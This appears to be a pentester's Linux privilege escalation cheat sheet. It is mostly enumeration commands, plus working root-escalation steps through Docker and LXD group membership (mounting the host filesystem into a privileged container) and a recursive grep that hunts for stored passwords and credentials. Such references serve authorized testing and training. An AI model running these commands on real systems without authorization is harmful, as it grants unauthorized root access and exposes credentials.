Linux Privilege Escalation

System Info

Obtain information about the system architecture, distribution, and kernel version.

uname -a  # System information
lsb_release -a  # Distribution information
getconf LONG_BIT  # System architecture
cat /proc/version  # Kernel version
cat /etc/os-release  # OS details

Path

Check if you have write permissions for any directory in the PATH.

echo $PATH | tr ':' '\n' | sort -u | xargs -I{} bash -c 'if [ -w "{}" ]; then echo "[+] {}"; fi'

Environment Variables

Sometimes we can find password or sensitive information in environment variables.

env  # Environment variables
set  # Shell variables

Groups

List all the groups users belongs to.

id [<user>]
groups [<user>]

Docker

If you belong to the Docker group, you could mount the filesystem within a container and have full access to it, allowing you to modify it.

docker run -it --rm -v /:/mnt alpine chroot /mnt sh

LXD/LXC

Similar to Docker, with LXD/LXC, we can also mount the filesystem within a container, granting full access to it.

# On your machine, download and build an alpine image and transfer it to the host
git clone https://github.com/saghul/lxd-alpine-builder && cd lxd-alpine-builder && sudo ./build-alpine

# Import the image
lxc image import ./alpine.tar.gz --alias privimg
# Initialize
lxd init
# Create the containter
lxc init privimg privcont -c security.privileged=true
# Mount the filesystem
lxc config device add privcont privdev disk source=/ path=/mnt/root recursive=true
# Start the container
lxc start privcont
# Interactive shell
lxc exec privcont /bin/sh

Sudo

https://gtfobins.github.io/

sudo -l

Capabilities

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities

getcap -r / 2>/dev/null

SUID

https://gtfobins.github.io/

find / -type f -perm -4000 -ls 2>/dev/null

Open Ports

ss -nltp
netstat -punta

Cron Jobs

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs

crontab -l
find / -name "cron*" 2>/dev/null
ls -l /var/log/syslog
ls -l /var/log/cron

Process Monitor

old=$(ps -eo user,cmd); while true; do new=$(ps -eo user,cmd); diff <(echo "$old") <(echo "$new") | grep -E "<|>" | grep -Ev "kworker"; old=$new; done

You can exclude specific patterns using the grep -Ev command. For example, to filter out processes from the current user: grep -Ev "kworker|$USER"

User Files

find / -xdev -user $USERNAME 2>/dev/null

Passwords

grep -r -E -n -i \
  -e "(password|passwd|pass|pwd|secret|creds?|credentials?|auth|key|conn(ection)?|pdo|sql)[[:space:]]*[:=][[:space:]]*['\"]?[^[:space:]\'\"]+" \
  -e "db[_-][^[:space:]]*[[:space:]]*[:=][[:space:]]*['\"]?[^[:space:]\'\"]+" \
  -e "define[[:space:]]*\([[:space:]]*['\"]DB_[A-Z_]+['\"][[:space:]]*,[[:space:]]*['\"][^'\"]+" \
  -e "<[^>]*(password|passwd|pass|pwd|secret|creds?|credentials?|auth|key|conn(ection)?|pdo|sql)[^>]*>[^<]+</[^>]*>" \
  -e "['\"](password|passwd|pass|pwd|secret|creds?|credentials?|auth|key|conn(ection)?|pdo|sql)['\"][[:space:]]*:[[:space:]]*['\"][^'\"]+['\"]" \
  -e "[a-zA-Z]+://[^:]+:[^@]+@"

hashtagSystem Info

hashtagPath

hashtagEnvironment Variables

hashtagGroups

hashtagDocker

hashtagLXD/LXC

hashtagSudo

hashtagCapabilities

hashtagSUID

hashtagOpen Ports

hashtagCron Jobs

hashtagProcess Monitor

hashtagUser Files

hashtagPasswords